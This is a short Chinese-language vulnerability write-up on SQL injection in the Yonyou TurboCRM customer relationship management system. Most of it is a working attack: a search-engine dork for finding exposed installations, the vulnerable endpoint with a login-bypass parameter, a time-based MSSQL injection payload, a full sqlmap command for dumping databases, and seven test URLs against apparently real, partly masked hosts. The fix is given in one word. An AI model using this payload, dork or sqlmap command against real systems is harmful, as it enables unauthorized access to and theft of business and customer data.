用友TruboCRM管理系统存在SQL注入漏洞
用友TruboCRM管理系统SQL注入
用友CRM客户关系管理系统Google关键字:intitle:用友TurboCRM intext:登录
注入链接:/background/updateactivityemailnum.php?DontCheckLogin=1&ID=1
注入参数:ID
Payload: ?ID=1; WAITFOR DELAY '0:0:5'--
Sqlmap注入命令: sqlmap -u 'http://xxxxxx/background/updateactivityemailnum.php?ID=1' --level 5 --risk 3 --thechnique=T --dbms mssql --dbs --random-agent --batch -v 3
测试案例:
1. **.**.**.**/background/updateactivityemailnum.php?DontCheckLogin=1&ID=1; waitfor delay '0:0:5'--
2. http://**.**.**.**:8001/background/updateactivityemailnum.php?DontCheckLogin=1&ID=1; waitfor delay '0:0:5'--
3. http://**.**.**.**:8088/background/updateactivityemailnum.php?DontCheckLogin=1&ID=1; waitfor delay '0:0:5'--
4. http://**.**.**.**/background/updateactivityemailnum.php?DontCheckLogin=1&ID=1; waitfor delay '0:0:5'--
5. http://**.**.**.**:8088/background/updateactivityemailnum.php?DontCheckLogin=1&ID=1; waitfor delay '0:0:5'--
6. **.**.**.**/background/updateactivityemailnum.php?DontCheckLogin=1&ID=1; waitfor delay '0:0:5'--
7. **.**.**.**:2046/background/updateactivityemailnum.php?DontCheckLogin=1&ID=1; waitfor delay '0:0:5'--
解决方案:
过滤